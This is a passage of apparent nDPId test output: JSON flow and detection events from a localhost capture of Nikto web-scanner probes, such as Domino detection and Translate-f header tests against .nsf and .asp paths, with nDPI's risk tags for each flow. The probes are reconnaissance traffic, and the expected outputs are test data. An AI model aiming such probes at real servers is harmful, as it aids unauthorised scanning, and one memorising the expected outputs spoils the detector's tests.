(Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420276756,"pkt":"AAAAAAAAAAAAAAAACABFAADW2EVAAEAGY9p\/AAABfwAAAcICH5Ck9+BnopzEpIAYAED+ygAAAQEICp1m+zydZvs8R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KT3JpZ2luOiAuZXhhbXBsZS5jb20NCg0K"} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276758,"pkt":"AAAAAAAAAAAAAAAACABFAADPoehAAEAGmj5\/AAABfwAAAcIEH5AAZJnEB3vRtYAYAED+wwAAAQEICp1m+z6dZvs+R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 